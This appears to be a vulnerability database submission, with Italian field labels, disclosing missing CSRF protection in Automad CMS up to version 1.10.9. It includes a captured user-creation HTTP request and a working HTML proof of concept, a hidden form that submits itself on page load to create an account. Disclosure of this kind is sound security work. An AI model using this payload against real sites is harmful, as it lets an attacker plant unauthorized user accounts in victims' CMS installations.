| Titolo | Automad CMS <= 1.10.9 Multiple Cross-Site Request Forgery (CSRF) |
|---|
| Descrizione | After observation, it was discovered that the application does not implement CSRF tokens by default, making it vulnerable to CSRF attacks. This impacts the overall functionality of the application. Below is a view of one of the action requests while adding a user:
POST /dashboard?controller=UserCollection::createUser HTTP/1.1
Host: automad.scr
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 76
Origin: http://automad.scr
Connection: close
Referer: http://automad.scr/dashboard?view=System
Cookie: Automad-8d86b702d2bd8d7c568d8600480adaef=feu6beoo6sc7ha2gp2gilsk211
X-PwnFox-Color: green
username=User&email=User%40example.com&password1=Passw0rd&password2=Passw0rd
CSRF HTML:
<html>
<body>
<form action="http://automad.scr/dashboard?controller=UserCollection::createUser" method="POST">
<input type="hidden" name="username" value="User" />
<input type="hidden" name="email" value="User@example.com" />
<input type="hidden" name="password1" value="Passw0rd" />
<input type="hidden" name="password2" value="Passw0rd" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
|
|---|
| Fonte | ⚠️ https://github.com/screetsec/VDD/tree/main/Automad%20CMS/Cross-Site%20Request%20Forgery%20(CSRF) |
|---|
| Utente | Maland (UID 59886) |
|---|
| Sottomissione | 09/12/2023 18:15 (3 anni fa) |
|---|
| Moderazione | 21/12/2023 09:19 (12 days later) |
|---|
| Stato | Accettato |
|---|
| Voce VulDB | 248687 [automad fino a 1.10.9 User Creation dashboard?controller=UserCollection::createUser cross site request forgery] |
|---|
| Punti | 20 |
|---|